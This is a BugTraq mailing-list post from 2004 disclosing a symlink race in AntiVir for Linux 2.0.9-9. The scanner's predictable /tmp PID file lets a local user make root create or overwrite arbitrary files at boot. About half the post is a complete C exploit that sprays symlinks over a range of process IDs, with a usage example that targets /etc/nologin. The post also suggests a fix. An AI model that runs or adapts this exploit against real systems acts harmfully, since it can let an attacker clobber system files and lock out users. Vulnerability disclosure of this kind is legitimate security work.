BugTraq
symlink vul for Antivir / Linux Version 2.0.9-9 (maybe lower) Jan 13 2004 06:37PM
Rene (l0om excluded org) (1 replies)


discovered and written: l0om <l0om (at) excluded (dot) org [email concealed]>

date: 13.01.2004

risk: medium

page: www.excluded.org

symlink vul for Antivir / Linux Version 2.0.9-9

(maybe lower)

antivir gets started on bootup and creats a tmp file

(/tmp/.pid_antivir_$$ - where

$$ is the process id). the file got read/write

permissions for the superuser

and nothing more. the file gets created and wont be

delted till the system reboots.

well- as most of us know is the PID of a process is

not on ervery reboot the same.

so the PID of the antivir process goes +/- 10-20.

if we creat a link with the correct name

(expamle .pid_antivr_1204) which points

somewhere to the system, it will create or overwrite

the destination of our

symbolic link.

this exploits should work for most rebooting

systems, as we guess the pid of the

new process will be greater than 1000 and less than

2000. for better usage take

a look at the running procces ID and set the defined

START -20 and END +20.

sometimes one reboot does the job and sometimes it

takes two reboots.

i think the programmers could use the same method

like the guys from xmms. before

they creat anything they first "unlink" the filename

in the /tmp dir.

greets @ proxy, sirius, takt, maximilian, !ntruder,

fe2k, dna, feem, cyniker, xnet and the rest of

excluded!

example:

./antisys /etc/nologin

(reboot)

ls -l /etc/nologin

rw------- root root /etc/nologin

have phun!

*******************************************************************/

#include <stdio.h>

#include <unistd.h>

#include <string.h>

#define PATH "/tmp/.pid_antivir_"

#define START 1000

#define END 2000

int main(int argc, char **argv)

{

int i;

char buf[150];

printf("Antivir 2.0.9-9 exploit - written by l0om

\n");

printf(" WWW.EXCLUDED.ORG\n\n")

if(argc != 2) {

printf("usage: %s <destination-file>\n",argv[0]);

exit(0xff);

}

printf("### hit enter to create or overwrite file %

s: ",argv[1]); fflush(stdout);

read(1, buf, 1); fflush(stdin);

printf("working\n\n");

for(i = START; i < END; i++) {

snprintf(buf, sizeof(buf),"%s%d",PATH,i);

if(symlink(argv[1], buf) == -1) {

fprintf(stderr, "cannot creat symlink from %s to %s

[Nr.%d]\n",buf,argv[1],i);

fprintf(stderr, "skipping...\n");

}

}

printf("\ndone!\n");

printf("on the next reboot we hopefully create or

overwrite %s\n",argv[1]);

return(0x00);

}

[ reply ]
Re: symlink vul for Antivir / Linux Version 2.0.9-9 (maybe lower) Jan 27 2004 02:55PM
AntiVir Support (support antivir de)


 

Privacy Statement
Copyright 2010, SecurityFocus